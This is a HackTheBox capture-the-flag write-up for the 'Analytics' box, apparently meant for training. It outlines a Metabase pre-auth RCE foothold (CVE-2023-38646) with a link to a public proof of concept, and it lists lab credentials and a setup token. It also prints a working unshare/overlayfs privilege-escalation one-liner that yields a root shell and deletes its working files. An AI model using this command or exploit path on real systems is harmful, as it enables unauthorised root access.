Skip to content

Analytics -- HackTheBox (write-up)

Difficulty: Easy Box: Analytics (HackTheBox) Author: dsec Date: 2025-10-15


TL;DR

Metabase pre-auth RCE for initial shell. Found credentials in environment. Privesc via overlay filesystem capability abuse.


Target info

  • Host: Analytics (HackTheBox)

Enumeration

Nmap results


Foothold

Metabase pre-auth RCE exploit:

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc

Metabase exploit

Setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f


Lateral movement

Found credentials in environment:

Credentials

  • metalytics:An4lytics_ds20223#

SSH'd in:

SSH


Privilege escalation

Overlay filesystem + capability abuse:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; bash")'

Lessons & takeaways

  • Check environment variables for credentials after getting initial shell
  • The unshare + overlay filesystem trick is a powerful Linux privesc technique
  • Pre-auth RCE in Metabase (CVE-2023-38646) only needs the setup token